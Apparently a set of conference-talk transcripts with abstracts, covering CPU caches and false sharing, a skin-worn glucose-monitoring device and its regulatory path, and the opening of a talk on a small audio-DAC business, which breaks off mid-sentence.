I just want to look at two of them right now. So here's a couple of cores here. Now, let's suppose that I've got a multi-threaded program, so two of the threads happen to be running on different cores. And it turns out that one of the threads has read a particular piece of data from the main memory into its cache. Maybe it was doing a read. So let's just assume for purposes of discussion that here it is living cosily in the level two cache on core number zero. But it turns out that another thread working on the same problem, perhaps, has also either read or written, let's just assume it was a read, this particular chunk of data. So it has also happened to be sitting in its level two cache, let's say. So now we have a situation where we have conceptually a single piece of data. There's only one conceptual piece of data. It just happens to have been duplicated into the caching subsystem as an optimization to reduce latency. So let's assume that core zero does a right to that address. And let's assume that core one does a read to that address at the same time. So the question is, what is the value that is going to be read by core one, the old address or the new address? I mean, there's two copies of the value here. But conceptually, as a programmer, we're not thinking, gee, I think I'll program this so that it gets spread across four levels of cache, three levels of cache on four different cores, which means 12 caches and suddenly I'm confused. How many people have to program like that? That is the correct answer, zero, perfect. All right, no one has to worry about that. The reason nobody has to worry about that is because caches are a latency reducing optimization that is inside the hardware. There is only one virtual memory location with the address A. From the mental model of programmers, there is only one chunk of memory that has the address A in it. And it only has one value. All that hardware stuff is supposed to be completely hidden from you. Now, it turns out that in the hardware, when one of the cores writes to its copy of the cached value, magic ensues that disables all the other copies simultaneously. And there's hardware engineers who devote their entire careers to finding ways to make that work quickly. There's more than one way to do it. So that happens automatically. As software developers, you do not need to worry about this, which is good because really life would be much more miserable if you did. Well, I need to qualify that. As long as you engage in the proper synchronization, so in every programming language that I'm familiar with, if you have one thread writing some data and another thread reading the data at the same time so you haven't used any kind of synchronization to keep them from stepping on one another, bad things happen. That's called a data race. So assuming that your programs don't have data races. So you're using a mutex or using an atomic. You're using some kind of a message passing scheme. Assuming that you are following the rules dictated by your programming language to make sure that you get well-defined behavior. As long as you do that, you never need to worry about the hardware. On the other hand, if you program in some lower level systems languages C++ or C or D or other languages as well, anything that kind of has to get down on the hardware. Most of those languages basically say if you have a data race in your program where one thread's doing a read, another thread's doing a write and it's not synchronized. Those languages usually say results are undefined. We cannot predict what you're going to see. The reason that they cannot predict what you're going to see is because the hardware is going to be doing all kinds of weird stuff because the fact is on the hardware there are multiple copies of this data. That is why the language doesn't say well this is what's going to happen because it literally does not know. So the underlying hardware is why you get undefined behavior. Now the thing is assuming that you have followed the appropriate synchronization so that you have no data races in your program, this notion of what is known as cash coherency, making sure that different caches offer your software a coherent view of the values in memory is handled completely automatically by the hardware. But it takes time. It's not free. I said there's hardware engineers who devote their careers to making sure that this stuff happens. Nobody's found a way to make it happen instantaneously. In some cases we are victims of the fact that the speed of light is limited but that's a whole problem. And this leads to a new problem. So let us suppose here on core zero, here's a cash line here. Now let's assume that core zero is only looking at address A. And let's assume that core one is only looking at address A plus one. So I have two cores. They are accessing independent pieces of memory. There is no data race here. One core is looking at address A. Another core is looking at address A plus one. There is no data race. There is no need for mutexes. There is no need for atomic instructions. Everything is hunky-dory from a behavioral point of view. The problem is if they both happen to end up on the same cash line, then the hardware can't tell that they're independent pieces of memory because cash lines are read and written as a unit. So if I have two cores, both for example writing the same cash line, the hardware is going to think that every individual write invalidates the other copy of the cash line in somebody else's cash. Herb Center refers to this as cash ping-ponging. So one thread does a right that invalidates this other cash's copy even though there is no conflict. This cash does a right, it invalidates this copy. And that means you're going back out to main memory or you're doing some other kind of synchronization at the hardware level in order to make sure you get a consistent view of memory. This is known as false sharing. False sharing arises when you have independent threads that are accessing the same cash line. There is no data race, you don't need to use a mutex or anything like that. The problem is the hardware doesn't know that. You're slamming on the same cash line. So that's false sharing. Any questions about false sharing? Pardon me? Alright, so the question is if you have false sharing, how do you address it? Fundamentally what you need to do is to either, well actually so let's talk about what, let me defer the question because I want to talk about the factors that contribute to false sharing because then we can say if any of these factors is not true then you have eliminated false sharing. So let's go back to Herb Sutter's example with this notion of false sharing. So this is the original code that Herb Sutter showed. So in this case here we have an array of results and every one of the threads, all 24 because Herb has 24 cores, are saying plus plus result of P whenever they find an odd number. Now that's a read modify right operation. But if you have two threads where one of them is doing plus plus on its index, maybe index number three in the array and another thread is doing plus plus on its index which is maybe number two in the array, they're independent so there's no conflict but they're probably on the same cash line. As a result this is slamming the underlying hardware system which is constantly trying to update all these different copies of this index. So with 24 cores that array is probably duplicated 24 times in 24 different caches and every individual reader right or every right is going to invalidate all 23 other caches even though there's no conflict. That also explains why the simple solution of creating a local counter inside the thread. Now this local counter is going to be on the individual threads stack which means it's probably not on the same cash line as anybody else's counter. And now all the work of incrementing the count is occurring on the local variable inside the threads stack which means it probably doesn't conflict with anybody else. There's no false sharing there and then when each thread is done yeah they still have to access results of P but instead of slamming on it the entire time that they're trying to count how many odd numbers what they're doing is making only one right. So there still could be some false sharing but it's going to be for a very short period of time. That explains why this seemingly peculiar optimization of going from writing directly to the array to going to writing through a temporary in some sense makes things run a whole lot faster. It's worth again taking a look at how this manifests itself in terms of scalability results. So this is the scalability or I guess I should say the lack of scalability if you have false sharing and this is the scalability if you do not have false sharing. Now in this particular case an example of how to solve it was to simply prevent all those threads from hitting that same chunk of memory simultaneously. So the problem of false sharing it tends to arise only as long as all of the following things are true. The first thing is you have to have independent variables or independent values falling on a single cache line. So if you have two things that are next to one another in memory and you separate them so that they're no longer next to one another in memory that is one way to eliminate false sharing. Where different cores are concurrently accessing that particular cache line. If somehow you can set things up so that only one core is accessing a cache line there's no such thing as false sharing within one core. It only happens if you have multiple copies because it's the cache coherency that's the problem. If there's only one core that's accessing a chunk of memory it'll only be in one cache. And this is only going to matter if it occurs frequently. If it's every once in a while it's not likely to be a performance problem which is why Herb's solution works. And at least one of them is a writer. Readers don't conflict. Only readers and writers or writers and writers conflict. So to get now to your particular question we now understand ways to eliminate this. Basically if we can get any of these four things to not be true we don't have to worry about false sharing any longer. So in the case of Herb Sutter's example what he did was he took two values which were close to one another in an array. First he separated them by putting essentially one of them in the thread stack frame. So that separated them and what that meant was when he did have the right to the array it wasn't frequent any longer. I want to point out that pretty much all kinds of data potentially are susceptible to false sharing. So anything that is statically allocated so for example global variables. If you say global int x not that you would but think about the people you work with who didn't come to the conference. What are they doing while you're learning about CPU cores. So if you say a global int x and a global int y they could very easily end up on the same cache line. So if it turns out that they're being hammered by different threads that fulfill these criteria you can have a false sharing problem. Or if they're static at file scope for example. A heap allocated. Normally people think well heap allocation I couldn't possibly have any problem with heap allocation. If it turns out that I heap allocate this and then maybe I allocate this and deallocate it and allocate it and deallocate it and allocate it and deallocate it and oops it it's sent over here. So I could have two completely independent, temporally independent chunks of memory that by bad luck end up on the same cache line. And the chances of this occurring increases if you are for example writing a clustering memory allocator. Assuming you're working in a language where you can do that kind of thing. But this can happen in languages with managed memory as well. Because the garbage collector doesn't know for sure or the compactor doesn't know for sure what the lifetimes of things are. It will try to avoid this but it is still possible for it to occur. If you have an automatic variable. So something which is local on your stack. Normally you're not going to get false sharing between some other thread. Remember you have to have multiple threads actually these things for them to be a problem. Normally things that are on the stack frame of an individual thread are invisible to other threads. Which means they don't suffer from false sharing. On the other hand if you have let's say something on your local stack frame to local variable and then you decide to spawn a thread and you pass a pointer or a reference to it. So now the other thread has a way to get at your chunk of memory. That can lead to false sharing as well. Any questions about false sharing? Okay so the observation here is that there's this lovely little performance jump right here. And so the question is I mean is that related in somehow or is that completely independent? I don't know for sure but here's my suspicion. My suspicion is that that jump right there corresponds to a break in a cache line. In other words the array was broken across two cache lines and that's the end of the first cache line and the beginning of the second cache line. So you'd have to do more experiments to find out for sure but that's my suspicion. Which means if you run it multiple times with multiple compilers you actually get different results. If you rearrange the order in which things are declared it might get moved around on the cache line and then the shape of that could change a little bit. All righty. So regarding false sharing this is a comment from one of the performance guys at Microsoft and some of these people wonder why I quote from Microsoft all the time. They blog more than other people. That's why. So anyway he says during beta one performance milestones and parallel extensions most of the performance problems came down to stamping out false sharing in numerous places which is kind of scary. Most of the performance problems not the occasional performance problem but most of the performance problems. So false sharing is worth knowing about plus it's just kind of a cool term. So to summarize where we are the first thing is that as far as the hardware is concerned small is the same as fast or what I really should say as big as the same as slow. There's no time space trade off in the hardware. Locality counts you want to stay in the cache both the instruction cache and the data cache and predictable access patterns count you want to be prefetch friendly. That's the general summary but what does that mean in terms of trying to get your programs to get along well with the hardware. The first thing is for data where it is practical consider employing a linear traversal of an array. That's what the hardware really likes. I was talking with a CTO of a particular of a guy at a particular financial services company. They do algorithmic trading which either is the end of the world or providing needed liquidity depending on your feeling about algorithmic trading. And he goes well I don't know about blah blah blah data structure but I know that an array is going to beat it. Which is not always true but to a first approximation it is actually true because the hardware loves array traversals. That in fact is the only data structure the hardware loves. So if you can employ a linear array traversal that's what you want to do. Second thing is you want to use as much of a cache line as you possibly can. What you don't want to do for example is read an entire cache line use only a tiny little piece of it and then move on to some other cache line. Now remember that was the problem we had with a column major traversal of a matrix but here is another example of it. So this one was contributed I am still alive I can't believe that. So this was contributed by Bruce Dawson he used to work for Microsoft and in particular he worked in the Xbox division. So he would work with developers and with companies who were developing video games. And so in video games it is not uncommon to have an object and objects can be alive or dead for any one of a number of reasons because it's a video game. So there'd be a Boolean saying whether this thing is live and might have actually been a bit field. So then we'd have for example a vector of objects and then what you would have imagine this is in your game loop in your rendering loop. Well you got to figure out what you have to draw on the screen or what you have to move or update the physics for whatever it happens to be. So for every one of those elements if the object is alive you want to do something with it. Now think about what this means. You're reading an object now the object has a multiple fields right. One of the fields is this Boolean but it probably has some data before the Boolean maybe some data after the Boolean. So when you read in the object you're probably occupying oh let's just assume it's a 64 byte cache line. You then check the Boolean which worst case might only be a bit field and if you find that it's zero you throw the entire cache line away and move on to the next object. So this has some interesting implications. Now let's suppose that your Bruce Dawson you're doing some performance analysis and you see this kind of thing in a game which he said was very common. How do you fix that? Yes. Pardon me? Arrays. Arrays of. Okay so I assume what you mean is you take those Booleans out of the objects you put them into some separate array for example of Booleans. So let me translate here because I this is the way that you do it. You go to object-oriented programming and you kick it in the teeth. You say this whole nonsense of taking data and functions and bundling them together. No we're going to rip out the data now and stick it in an array that nice high-level data structure. Why? Because the hardware likes it. Did you have a question? Okay so essentially we can split the object maybe into multiple pieces. The essential data which maybe is very small and something else and that's consistent with the same idea but the whole thing is what's interesting is that for many for decades now people have learned what you want to do is have objects they represent these really nice abstractions we're bundling the functions and the data together so it'll be really easy to read and write and reason about the programs all of which is true but remember the hardware toaster. So this is not friendly to the cache in many cases. So there's actually other schools of design which involve trying to take abstractions and yet at the bottom of the stack trying to make it so that the data is also very CPU friendly. Yeah. Okay so Kevlin's suggestion is that you can use the objects for state pattern. Thank you. Collections for state pattern. You can tell I'm not as familiar with it as I might be and which he says allows you to remain object oriented but is consistent with using the hardware without without going against the grain of the hardware. So nevertheless the observation is that if you want to get maximum performance you're going to have to take the behavior of the hardware into account when you are designing your data structures. And the last thing you can do is you need to be alert for false sharing in multi-threaded systems. I would love to be able to tell you that there is some great set of tools which will go oh you got some false sharing going on there. Let me tell you how to fix that. And currently we do have such a tool it's called an experienced senior engineer who looks at your scalability and goes oh you got some false sharing going on there. Let me show you how to fix that. There are tools which can give you some information for example Bruce Austin was talking about I guess Bruce here is. They had a special tool that they actually made at Microsoft for the Xbox division and what it would do is it actually showed when a cache line is brought into memory what percentage of the cache line is used before it gets evicted from memory. That is not a standard tool but that was something that they developed to be able to identify these kinds of problems. So currently you can get some information for example from Intel's V-Tune and there's some other things that you can do but alas this is still this is kind of at the level where if you are used to programming in an unmanaged language and you suddenly see completely weird results going on experienced people in an unmanaged language go oh it's probably a wild pointer pointer that's writing beyond the end of an array or has miscalculated an address. I mean it just it looks like that after a while. So false sharing you just have to be aware of its existence if nothing else. So that's for data for code the first thing is you want to fit your working set in the cache. So this also has some other interesting consequences. Let us suppose I have let's say an inheritance hierarchy got a base class and I've got three derived classes so we've got derived class one derived class two derived class three and what I want to do is I want to put them all in a collection so I've got a collection of base class objects or pointers to base class objects but it actually is gonna be of type one type two or type three and now what I want to do is walk down that collection invoking some virtual function some virtual method on every element of the container. So this is a classic use of polymorphism of runtime polymorphism in obfugrated systems. So let's assume the function we want to call is f because that's just what functions are called. So I go to the first element I make the polymorphic call to f let's assume it is an object of type one we go down to the class of type one guess what f's implementation for type one is not in the instruction cache no problem we fetch it from main memory we put it in instruction cache we execute f yes we go to the next element of the container because we are unlucky its type is number two alas we do not have f's implementation in number two in the instruction cache no problem we go to main memory we get the instructions we put them into the cache we execute them yes we go to the third element the third element of course is of type three we don't have f's implementation for type three we go to main memory we want to put it in the cache the cache is too small it will not fit no problem we evict all those old instructions from the f of type number one because we haven't used them in a long time we write in number three we execute number three we go to the next element of course it's now of type one you can see where this is going this is not by the way a theoretical problem many people especially in the video game industry have run into this kind of thing there's a variety of ways you can solve the problem but one of the ways for example is to sort the sequences by type so you could have three different containers all the type ones all the type twos all the type threes or you can actually put them all in the same container that'll still work as long as all the ones are at the beginning all the twos are in the middle and all the threes are at the end but again it has to do with keeping track of what's going on in the instruction cache that's the kind of thing you're trying to avoid you've often heard I hope that the fastest kind of code is straight line branch free code now you know why straight line branch free code is really really friendly to the pre-fetchor in the instruction cache if you're just going instruction instruction instruction no branches it's prefetching all the instructions that you're probably going to need so straight line code so if you know that you have some code that has to run really fast but there's a few cases that are exceptional that are unusual what you want to do is do some tests for those up front make them non inline function calls to get them out of the fast path so that everything else is straight line code that'll be fastest I will ask the questions answer with I'm almost out of time here so I'm going to defer the questions till the end of the talk inlining you want to inline cautiously the good thing about inlining when you inline a function call you're not making a jump to subroutine which means you got rid of a branch yes we hate branches branches are not good for instruction pre-fetch furthermore doing inlining allows compilers to perform additional optimizations have to do with context and call specific optimizations so that's really nice problem with inlining is that if I have a function call in 20 different places and I inline it in 20 different places I get the same code in 20 different places and now I can overflow the size of my instruction cache so trying to find the right balance with inlining can be tricky there's a couple of optimizations that compilers or build systems offer that are worth knowing about one of them is PGO PGO stands for profile guided optimization it is available for at least many compilers for unmanaged languages the nice thing about PGO is it actually does a lot of these optimizations for you automatically so you don't have to do them yourself and WPO stands for whole program optimization which again is a set of optimization so if you have tools in your build system which can perform instruction rearrangement figure out what is hot cold what is cold code that kind of stuff you want to take advantage of those things whenever it is possible so if you are interested in further information about CPU caches sort of the heart of the machine the first place I always go is what every programmer should know about memory which I it's where I go if I want really detailed information I'm not sure every programmer really needs to start on page one it starts with transistors and it goes from there and I didn't feel compelled to understand exactly how transistors work but it probably would have improved my understanding but if anything to do with CPU caches that's the first place I go that's that's that's really good and I think everything else though you can probably well take a look at it later so we have about one minute so any questions about CPU caches yes correct okay so the observation is let us suppose that I've got a thread running on a core and now we get swapped out for example so all of its instructions and all the data that it's using are in the cache for that core and then the next time it's time slice comes around it gets rescheduled to run on a different core because now everything is cold and this can make it obviously run slower so the question is what can you do about that kind of thing normally what you do is if you have a manual level of control there's something what's known as core affinity so for example if what you want to say is this thread should always run on this core and not be permitted to migrate then affinity is a way to express that now thread scheduling subsystems that have to do this kind of stuff they are well aware of that problem so they're going to try to avoid migrating a thread from core to core if they can avoid it but if you got a lot of threads and there's over a subscription sometimes you're gonna lose but I think the standard low-level approach assuming you have access to an API that gives it to you is to use core affinity we have time maybe for one more question yeah okay so the question essentially is I made the comment that straight line code is friendliest for the prefetchor and the question is isn't it also sort of friendly for the the cache itself because for example when you read in 64 bytes that might include several instructions with no branches and the answer is yes so the two things clearly they work in concert so the basically when you read in a cache line you're hoping to get multiple instructions on the cache line and as long as there's no branching you're going to be able to execute all of them and I think we are out of time now so thank you very much please let the conference as well as me know what you thought of the talk by picking up the little green pieces of paper or other colors and putting them in the bin thank you
No matter what programming language or technology you use, if your software fails to make effective use of the underlying CPU caches, your system's performance will suffer. A lot. This session provides a wide-ranging overview of CPU caches, how they operate, and how that affects high-level decisions on things like data structures and traversal strategies. Both single- and multi-threaded execution are considered. Specific topics include different cache types (data, instruction, TLB); private and shared caches; cache lines and speculative prefetching; false sharing; and cache-friendly program organization, data structures, and traversal strategies. If you care at all about performance, the information in this talk is essential.
10.5446/50511 (DOI)
My name is Dian Larsen. I am with a company called Predictor. I'm here to talk to you about medical device. It's Internet of Things, but it's a special consideration. If you won't have it classified as a medical device, I'm used to medical settings. So when we got asked if we want to have a talk on the Internet of Things, I was thinking perhaps it was just tweeting toasters all day, but it seems to me like there's actually a lot happening with Internet of Things today. I come from a company. We are very used to Internet of Things, at least some kind of net and some kind of things. Does anyone know what this is? Probably not. It's for making huge silicone crystals. You see, there's a little guy in the left corner. So that's them pulling out big crystals from these machines. So we do some of the control on these machines, these things. And they are hooked up to Internet. So we're thinking we've been doing IoT for years. This is the chokes and the valves on Orymen Lange, huge oil installation, oil and gas installation. So we've been doing control on these. And these are hooked up to the Internet as well. This is a paper factory. So we do control and surveillance and logistics on these. And then we have this one. I should have a pointer. You see the red stuff in there. That's meat and the shiny tube up there. That's our device for meat control. So it's Windows PC and a spectrometer and a light bulb. So we emit, we read the infrared light from the meat back into the spectrometer. And then by doing some machine learning stuff, we can tell the guys if they are producing with the amount of fat, the amount of protein, and the amount of water. We do this for milk and cheese and grain and a lot of stuff. And these can be hooked up, bunch of them across an enterprise. And they work together and they share their calibration and models. So that's real Internet of Things because all this happens with the devices talking to each other. We also have some software for helping this to happen. This is acquisition software. We can get signals from just about anything. If any of you were at the OPC UA talk next door, this is also an OPC UA server and a client. And this is designed to acquire like 100,000, 200,000 signals on the small computer. We also do process modeling. This is important because this is what I'm going to talk about for the medical device. So this is what we do in model physical processes to try to figure out if we're able to estimate something useful from taking all the signals in from that acquisition software into the model and see if we can estimate something new. We have models of this and we also have some tracking for logistics. And now to the important part. This is a picture from 1980 or 1979. There's probably a few of you who know this guy, Steinar Seyled. He's a cybernetics professor. So he's sitting there with his, this is a local area network of things, trying to get both to stand still in a storm. So it's dynamic positioning. And this, as I said, this is 1980, I think. Four years ago he got a stroke. And then one thing you do with people who get stroke is to measure the blood glucose. I don't really remember why, but they have to prick his finger all the time. So he was the most curious, he's always curious. I don't know any person that's more curious than him. So he was thinking about all this, pricking his finger. And he was thinking about the meat. And he was thinking about the physical processes. So he was thinking, I can use this, I can use the stuff we have done before to measure glucose in the blood. So he was doing this because of a stroke, but he was thinking a bit further ahead. We have, there's a reason for doing glucose. There's one in 11 adults that have diabetes. I guess there's about 30 or 40. So there's perhaps three, four people here with diabetes. Half of them don't even know that they have it. And there's quite a few people dying from it. For diabetes, there is a rule, something called the rule of halves. So you have about 400 million people have it. Half of them don't, only half of them know that they have it. Of the ones that have it, only half of them receive treatment. For half of those people, the treatment is efficient. And for the half of that, again, the treatment is giving you good results that you are in control. So we decided we should take that big tube and some of the software and make a device, a medical device, so that you can use it in hospitals. And for saying that we can measure your glucose continuously without you having to stick your fingers. Because that's important. Diabetics have to either stick their fingers 10 to 30 times a day, or have some implants into the body that they need to change every two weeks or something. So it's very costly as well. 12% of global health expenditure is used on diabetes. And much of that is because of situations where people are not in control. Okay, so we have tried to make this. We made the first version, well, actually the first version was this big tube, where we had just put the optical fiber in and held it against the finger. But this is the first embedded version. And this is in use, and there's some dreams about how it should look like. This is a rendering, the one into the right. Then there was a new rendering where we was thinking of not having a display, but that made it hard for the users. And then we did clinical tests with the one up to the right. So we did on patients. I think it was 12 diabetics in Tronym to get the clinical proof that we are actually measuring glucose. Because this is something that's been tried a lot to actually measure the glucose. We use infrared spectrometry, and the information is in the fourth decimal. So it's much more noise in the signal than there is actually, and then much more noise than there is a signal. But that's doable because of the modeling. So this is the current version. And as you can see, we do the electronics production at ourself. So we have designed electronics, and we make the electronics, not the board, of course. And the red bag is then the ESD protection after we got our self-production line manager. Because we had some ESD electrostatic troubles. So this is from Technisk Ykebratt, a Norwegian journal, technical journal. And this is one rendering, and this is the current version, and that's the one I'm wearing now. This one. So my blood glucose now is five millimoles per liter, and that's good for a healthy person. And I bet it would be very happy to be flat on five. So I was thinking, since there was no camera here, I was trying to get you to see the device. You'll see I have five, and there's three quarters of battery left. My glucose is five, and there's buttons here for adding. If I take insulin, and I want to tell this modeling this, I can do that. And if I stick my fingers to calibrate, because if it's unsure, it will ask you to stick your finger. Yeah. So how does this all work? Because this has been tried a lot of times before, but we have finally figured out how to make this work. So this is the bottom. Let me take off the device and show you. This is the underside of the device. You see the four dots there? And then that's bio-impedance sensors. So we're sending high-frequency voltage into the skin. And we have optical sensor, and we have a lead package. So we send out infrared light. I will measure how much is coming back in various bandwidths. And we try to send very small current into your body to measure as well. And then we do sensor fusion with this to predict how much blood glucose you have. In addition, we have a metabolic model. This is modeling of the bodily processes that happens in you. It's used as a kind of a filter or verification. So this is, if you're a math person, it's a Kalman filter doing all this. Yes. So this all works fine, but it does not work all by itself. The next slide is also called under the hood, but I don't know what we should call it. This is what we need to have. We have the device, and for it to operate correctly when I get it the first time, I need to monitor. The device has to figure out what's special with me in difference to other people. So it will just sit on my arm and I will tell it how much blood glucose I have, and it will measure your spectrums and your bio impedance. And that will be shipped to a back end. And that's, we have a back end going at our office and in a couple of cloud providers. So that's normal machine learning. It's supervised learning going up there. So when it has figured you out, it will ship the models and the parameters made for you back to the device, and then it's standalone as I have it now. So now it can work just for me. If I put this on another person, it will not work. It will just say, I can't understand who you are. This is calibration run that's needed individually. As of now, we connect either using a USB on a computer. We will use that when we have a lot of telemetry from the electronics because we do some surveillance and monitoring there as well. Or we use BLE, low energy Bluetooth. Any questions about this one on the previous slide? Okay. Now to the thing that makes it a bit more difficult being a medical application. I have drawn an axis. This is how stringent, how strict are the rules for you to operate. And to the right, that's the cost of implementing the next feature you thought about. You can make a web page with something going and just put a beta stamp on it, and it doesn't cost you anything else than just making the code. That will be very cheap. For doing medical applications, you are up in the highest. Adding a new feature for a medical device, that's extremely costly. You have to do all the verification of quality and risk. You have to get trials approved by ethical committees. You have to do the trials and have independent investigators look at the trial. You need to have an application for a notified body to have... to go through your quality and risk management system and act the actual tests. And you need to do a bunch of tests for biocompability and for risk testing. So this is a challenge for when making medical applications and devices. But you can do something. You can have consent. You can tell a user, if you consent to this, you can do this and that. That's not everything you can do that with. You can't make an operating robot and make a user just consent to using it. There must be some regulations for using for medical use. And there's another step in this. That's more a community part. That's when you start using data from more users, combining this like you're supposed to in Internet of Things. And we do that as well for training. We can take models from a lot of people. We can figure out sometimes that that specific guy has a model for him that will fit you better than your own. So that's a community. So our dream is to find that one special model that will work for a whole lot of people. That requires quite a lot of computing power. How much time do I have left? I just have a few minutes. Sorry. So the way we solve this is you take your medical device and you figure out the intended use. What are you going to use it for? If you say you're going to use it to measure glucose, don't measure anything else or try to do something clever because that will violate your conformance. So the first thing is to make sure you know the intended use. And everyone who's working with it and writing papers and doing quality checks should know this. But you can also strive to deploy a separate system for separate regulatory domains. That means you can have other functionality that's not the main use of the device. For instance, you can have a notification of parents for kids with diabetes. They can have parents getting a notification. This is not a medical device. That can be a separate use. So you need to make sure that you have a system that can be deployed for its regulatory domain. So you need to be able to copy, get this compliance system, make a copy, make another system, get compliance. Because if you're going to make the whole system a medical device, you will not... We will fail because it's impossible. And you kind of see this if you look at medical devices. They all look a bit dated. That's because the process, it takes a few years. And if you change anything, you have to go back and get re-certification. And then there's... The tip number three is make your procedures, your software and firmware in a way that allows you for making tip number two work. Obviously, I'm not going to make a completely new system from scratch between the pure medical, the more private, non-medical usage, and something for the community. So we have... At work, we have a competition. So that's why the last slide is picture time. Can I take a picture because we're trying to figure out who gets the best picture of the device during this year? So... If I can get some help from you. And it has to be... It has to be a good picture. Can I get the hands in the air? Whaaaaa! One more. Sorry. Yeah, thank you. So I think I'm going to win eventually. I have to go to the mountain top or something. Are there any questions? Yes. Yeah, about the spectrometer. The price or is it something you recommend a hobbyist to try out? Yeah, the question was about the spectrometer. And if you want to try this out for a hobbyist, then it's not that expensive. So that's... If you see here, we have the round yellow part. That's... It's not expensive. I think that I can't tell you the price of the whole device. But it's not intimidating. It is really good if you're willing to do calibration. Because all this lead package, we use infrared lead diodes. All these need calibration and standardization. And the same for the actual spectrometer, the sensor. But it's straight forward, it's normal calibration. So it's... You can figure out a lot of stuff. We... This is a medical device, but we can... I have the office record in lactate. We can measure Melkisgyre. So we just slap it on the calf with some tape and just go full out on a stationary bike. And it's... You can measure a bunch of stuff doing this. And it's known... It's known technology. What's not known is the stuff in here. So that's what makes us able to read glucose. Because it looks almost like water, but not quite. So when you're measuring on the body, that's mostly water. It's kind of hard to figure out the signal, but we're able to. Yes? Can you tell us about this... What is the market as well? How do you set up the lines? No, we... There's much smaller compliance. That's self-declaration. So just sending to get the CE marking for non-medical use. So that's obviously a market, but we still think the diabetics need some help. But there is... There are some projects for non-diabetic use that we are doing as well. Yes? How far are you in the medical improvement? We have been doing the second interim study for... What do you call that? Clinical trials. And we have started the process of selecting a notified body. So our target is... I can't tell you exactly, but it's not far. So it's one year, two years. So that's our goal, to get this medical CE approval for Europe. If we are going to do China, which we probably are, that can be a bit faster. Yeah, any more questions? No, it's Neil then. So I didn't know Neil, but his company supplies the microcontroller running in the deep in here. Thank you.
Hundreds of millions of diabetics around the world are currently pricking their fingers or implanting devices for monitoring their blood glucose levels. Prediktor Medical has developed a wearable device that measures blood glucose by only sitting on the skin. This is done by a combination of sensors, sensor fusion and distributed machine learning. He will discuss the process of preparing for launch of the combined system of devices, processing nodes and storage systems.
10.5446/50513 (DOI)
I'll do this in English for the sake of the recording. Anybody want to ask questions, you can do it in English, Norwegian, doesn't really matter. I'm here to tell you about a business angle. Later on I'm going to tell you about an embedded debugging angle too, so feel free to see my second talk this afternoon, but at least for now we're not using all the props, just some of them. So why am I here? I'm here to tell you a story about a small business. Hopefully I can save you some time and resources in developing your businesses. I love to come out and meet with new people and that's my main reason for coming. I'll tell you chronologically about Henry Audio. You've heard about the brand Henry Audio before. The marketing department needs to step things up a little bit, obviously, which is trying to do, which I'm getting to, but there's a story that leads to a product and I'll tell you the story today. I have tried to extract some business learning points from that, which I will summarize and try to make like boom, boom, boom and make those clear and those are my own opinions, those are not facts or anything, they're not based on solid statistics, but it's my advice, what I would have loved for someone to tell me five, six years ago. So who am I? I'm a father of two, I'm a networker, I'm a hardware hacker, I meditate with a soldering iron and I'm also a bit of a sales guy, I love to go out and sell it, not just make the thingy work. I'm on Oski, I have one of those, it's from 1985, it hurts a lot the first two years. So while I love to think out of the box, I drive to the slopes in one of those, so I can play it safe at the same time, it's a little bit of a mix. So there you know where these opinions are coming from, extrovert geek, plays it safe out of the box. So audio and the internet of things, so Henry audio has made this, it's a digital to analog converter, what it does, I'll show you a little bit later, what it looks like front and back, might be a little bit hard to see as I'm holding it here, this makes your music emotional again, people have an emotional connection to music, at the same time music distribution is so convenient these days and I'm trying to say that the two can be combined and the Henry audio USB DAC 128 mark 2, which is the name for this, does that, it makes an emotional connection and your stereo at home, you can sit down, listen to your music, enjoy that, enjoy the convenience of modern streaming services, it's a thing, it connects to the internet, that's why I'm here, and by the way it's open source, so this comes from a passionate group of people who have put it together in their spare time. So first the box, it turns abstract digital data into something tangible, so a digital signal enters this one on a USB port, that's an abstract signal, you can't really sense that and I'm talking a lot about that, how the digital world is very precise, but it's also very abstract, so the things we make, the sensors, the transducers, everything we make turns something digital into a real world phenomenon or the other way around. This one has no IP address, but it takes music out of something which does, so where is digital music today? I think it's stronger than ever, there's huge connectivity, there's huge availability, the availability of music today is something we've never seen before. Probably the DRM hurdles I've taken care of, so the middle picture there where some senior CEO in the record industry wants to own everything and the only way to access it easily is to steal it, those days are over and that is a good thing. There's a growing quality focus among consumers, so why am I telling you this about the music industry, first where it is today and then some of the hurdles, I'm getting to that, I'm getting to a business learning point and two slides. The biggest hurdles for the white adaption of my product today is people believe they can't hear a difference, people think they're not that complicated human beings, but they have a favorite brand of coffee, you've got a favorite brand of coffee, right, you prefer that coffee over the other coffee because you think it tastes better, so there's your favorite brand of coffee, some people even have a favorite brand of pasta, do you have a favorite brand of pasta anyone? No, but I mean if you can taste the difference between two cups of coffee you can hear the difference between good audio and bad audio. There's a couple other hurdles, there's a lot of people who think there's a price to be paid for convenience and there's a good reason for that, that's because the music industry and record industry has taught people that convenience comes at a price, in terms of quality, so back in the 60s, 70s, 80s we had the record player, we had LPs, in the mid 80s the LP was put aside, CDs gained popularity, CDs have a lot of convenience to them, you don't have to flip them over, you can push a button for the next song and you can even bring them to the beach. The first CDs didn't sound a lot better than the first LPs but they were so convenient and of course late 90s we had MP3 players come along, first MP3 players or even any MP3 player doesn't sound better than a CD player, a lot of information is simply not there. I also chose the graphics on purpose so that we went from high audio quality and nice highly detailed picture to less audio quality but very convenient and that's why I chose the not so pretty picture of the MP3 player. But now in this day and age I'm not the only one who makes USB DACs, I'm not the only one who can make your computer sound good in your stereo kit, a lot of people do that. But convenience and quality are more easy to join and have at the same time than it ever was. Is there anybody here from Microsoft? Good, and I can pull out a few more stops than usual, no I wouldn't have done anyway. If only Microsoft decided to support USB audio class 2. So Microsoft does not support USB audio class 2 in their current operating systems. Everybody else does, iOS, OS X, Linux, everything else works, Android works with USB audio class 2, Microsoft doesn't. So somebody buys this and they want to listen to high resolution music. They need to download a driver to make that work. That applies to me, that applies to everyone else. If they want to listen to CD quality music, Skype, title, Spotify, anything, it's plug and play. But the market for high resolution, the market where you sell audio like the camera vendors sell megapixels. That market is closed. You can't sell one of these because it has higher sample rate, higher resolution than the other guys have because Microsoft haven't opened up the protocol. So if you convince someone to buy that, then you also need to convince that person to go through the inconvenience of installing a driver. That person might want to compare three or four of these to make a good informed decision. At that point they've installed three or four different drivers. Then they run into DLL conflicts. I know people personally who aren't Mac users but who have bought a Mac simply to play music, to avoid the driver hurdle. Those customers are hard to win over when you're making essentially what is a gadget. So Microsoft can open up a market here if they just want to. A lot of people have tried to convince them that they should. This brings me to my first business learning point. This presentation is a lot of top down focus from the abstract down to the specific. My second presentation this afternoon goes the other way. That is a presentation that starts out with the building blocks and goes up. In the top down view, are there mega trends in your industry? The previous speaker said Airbnb, the whole sharing economy is definitely mega 